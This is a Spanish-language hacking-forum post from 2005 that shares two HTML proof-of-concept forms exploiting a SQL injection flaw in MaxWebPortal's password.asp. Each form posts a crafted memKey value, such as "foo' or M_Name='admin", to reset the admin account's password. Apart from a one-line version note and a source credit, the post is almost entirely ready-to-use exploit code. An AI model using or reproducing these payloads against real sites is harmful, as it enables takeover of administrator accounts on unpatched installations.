elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:16  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  MaxWebPortal-SQL Injection Vulnerability		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MaxWebPortal-SQL Injection Vulnerability  (Leído 423 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
MaxWebPortal-SQL Injection Vulnerability
« en: 25 Mayo 2005, 19:44 »
vulnerable hasta la version 2.0 (Password.ASP )

Código:
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin"
size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

Código:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">

<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admi
n' or ('1'='2" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

Fuente:Securityfocus

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines